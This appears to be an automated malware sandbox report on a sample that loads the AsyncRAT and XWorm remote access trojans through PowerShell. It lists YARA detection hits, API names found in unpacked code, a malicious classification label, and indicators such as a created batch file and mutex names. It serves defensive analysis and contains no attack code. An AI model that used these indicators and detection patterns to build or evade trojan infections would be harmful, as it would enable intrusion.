                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 28.2.powershell.exe.20601de4450.13.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.20601de4450.13.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 28.2.powershell.exe.206008ed970.0.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.206008ed970.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 23.2.powershell.exe.2cc07141480.1.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 23.2.powershell.exe.2cc07141480.1.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 18.2.powershell.exe.1e1aa248728.8.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 18.2.powershell.exe.1e1aa248728.8.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 23.2.powershell.exe.2cc07127e40.3.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 23.2.powershell.exe.2cc07127e40.3.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 28.2.powershell.exe.206008f65a0.7.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.206008f65a0.7.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 28.2.powershell.exe.20601dfa830.9.raw.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.20601dfa830.9.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 23.2.powershell.exe.2cc0714a0b0.4.raw.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.20601dfa830.9.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.20601dfa830.9.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 23.2.powershell.exe.2cc0714a0b0.4.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7ce2d5060.3.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7ce2d5060.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7ccde7168.12.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7ccde7168.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 28.2.powershell.exe.20601de4450.13.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.20601de4450.13.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7e4bb0000.16.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7e4bb0000.16.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7ce2eb440.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7ce2eb440.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 18.2.powershell.exe.1e1aa261880.9.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 18.2.powershell.exe.1e1aa261880.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 28.2.powershell.exe.206008f65a0.7.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.206008f65a0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 18.2.powershell.exe.1e1aa261880.9.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 18.2.powershell.exe.1e1aa261880.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7ccdde538.9.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7ccdde538.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 28.2.powershell.exe.206008ed970.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.206008ed970.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 18.2.powershell.exe.1e1aa248728.8.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 18.2.powershell.exe.1e1aa248728.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 5.2.powershell.exe.1d3133ad9a0.3.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 5.2.powershell.exe.1d3133ad9a0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7ce2eb440.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7ce2eb440.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7e4bb0000.16.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7e4bb0000.16.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 5.2.powershell.exe.1d3133975c0.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 5.2.powershell.exe.1d3133975c0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 23.2.powershell.exe.2cc07141480.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 23.2.powershell.exe.2cc07141480.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 23.2.powershell.exe.2cc07127e40.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 23.2.powershell.exe.2cc07127e40.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000001C.00000002.2323673539.00000206008C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000001C.00000002.2323673539.0000020601DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000001C.00000002.2323673539.0000020601DC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000005.00000002.2325412269.000001D313377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000B.00000002.1945403188.000001D7CE2B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000B.00000002.1945403188.000001D7CE2E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000005.00000002.2325412269.000001D3133AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000012.00000002.2074612069.000001E1AA261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000017.00000002.2248750195.000002CC070F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000B.00000002.1945403188.000001D7CCDB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000001C.00000002.2323673539.0000020601DE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000017.00000002.2248750195.000002CC07141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: Process Memory Space: powershell.exe PID: 7456, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7900, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3152, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7312, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 2720, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3130bafb0.5.raw.unpack, tcsnk.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3130b0098.1.raw.unpack, tcsnk.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3130da550.6.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.powershell.exe.1d3130da550.6.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.powershell.exe.1d31326fc88.4.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.powershell.exe.1d31326fc88.4.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.powershell.exe.1d7cdfeefc8.0.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.1d7cdfeefc8.0.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.powershell.exe.1d3130b0098.1.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.powershell.exe.1d3130b0098.1.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.powershell.exe.1d7ce1adde0.11.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.1d7ce1adde0.11.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.powershell.exe.1d7ce012688.10.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.1d7ce012688.10.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.powershell.exe.1d7ce019498.1.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.1d7ce019498.1.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.powershell.exe.1d3130d3740.2.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.powershell.exe.1d3130d3740.2.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.powershell.exe.1d3130bafb0.5.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.powershell.exe.1d3130bafb0.5.raw.unpack, tcsnk.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winVBS@52/31@4/4
                Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\dwm.bat
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3752:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\NZ6iGSEtCjLMGblP
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
